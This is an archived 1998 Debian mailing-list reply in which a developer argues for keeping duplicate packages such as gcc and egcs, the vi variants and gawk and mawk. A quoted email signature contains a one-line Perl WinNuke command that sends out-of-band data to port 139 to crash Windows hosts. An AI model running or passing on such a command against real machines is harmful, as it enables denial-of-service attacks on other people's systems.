[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: FWD: Re: lxdoom dehacked



On Thu, Oct 22, 1998 at 06:54:43PM +0100, Edward Betts wrote:
> On Wed, 21 Oct, 1998, Joey Hess wrote:
> > Thought those complaining of no dehacked support might find this useful. Any
> > other reasons to keep the old dosdoom around?
> 
> any reason to remove it?
> 
> i mean we have xemacs and gnu emacs, egc and gcc, gawk and mawk, nvi and vim
> and elvis. We defienatly need to go through deleting some of these duplicates.

Zapping any of the packages you listed, aside from MAYBE emacs, would
result in numerous people out for your head, myself included.. (=:]

There are VERY good reasons for keeping gcc and egcs, all the different
vi's, gawk and mawk have slightly functionality, etc....

Basicly, more choices are better IMHO..

Zephaniah E, Hull, <--- Uses both vim and elvis, and gcc and egcs..

> 
> -- 
> a=IO::Socket;perl -M$a -e$a'::INET->new(PeerAddr=>"host:139")->send(1,MSG_OOB)'
> 						-- winnuke in ONE line
> 
> 
> -- 
> To UNSUBSCRIBE, email to debian-devel-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
> 

Attachment: pgpEBNnTNP0D9.pgp
Description: PGP signature


Reply to: